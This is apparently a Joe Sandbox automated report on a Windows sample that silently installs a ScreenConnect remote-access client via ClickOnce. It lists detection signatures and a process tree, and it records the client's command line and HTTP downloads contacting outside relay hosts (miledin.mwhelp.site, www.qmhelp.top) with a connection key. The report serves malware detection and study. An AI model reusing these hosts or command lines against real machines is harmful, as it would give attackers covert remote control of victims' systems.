Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
Analysis ID:1638477
MD5:bfaaad29d18f516511ec1741e1a091db
SHA1:39e2258863f4e1035568a16eec5def14cb602986
SHA256:b609603b40e7eb6d2dfdea9ea187eb82c1a7b55c85965f694548dd6cef36e9f5
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool
Score:51
Range:0 - 100
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe" MD5: BFAAAD29D18F516511EC1741E1A091DB)
    • dfsvc.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 4068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 316 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000001.00000002.3054816957.000001D2D980A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000009.00000002.1871815455.000000000286A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.510000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49722, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 172.67.181.28, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe, ParentProcessId: 7636, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, ProcessId: 4068, ProcessName: WerFault.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeVirustotal: Detection: 16%Perma Link
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                  Uses 32bit PE files
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 172.67.181.28:443 -> 192.168.2.4:49722 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb(s( source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb> source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Windows.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb%)Sw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb` source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbROF source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: entService.pdbr source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.pdb0 source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF056000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871339597.0000000000ED0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831463096.0000000004FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1417484650.00000000004DD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdbul:YGvd source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbH9 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: HP+nXC:\Windows\ScreenConnect.ClientService.pdbP source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830358109.0000000000B78000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe) source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Configuration.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: @7n.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF052000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831637718.00000000050B2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: ?7nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdba3a source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP+n0C:\Windows\mscorlib.pdb\ source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF05A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF432000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1832015455.00000000056C2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: System.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.pdb4 source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbt]yw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: creenConnect.Core.PDBDL33 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00624B9B FindFirstFileExA,0_2_00624B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: global trafficTCP traffic: 192.168.2.4:63082 -> 62.182.86.171:8880
                  Source: global trafficTCP traffic: 192.168.2.4:63074 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: www.qmhelp.topAccept-Encoding: gzip
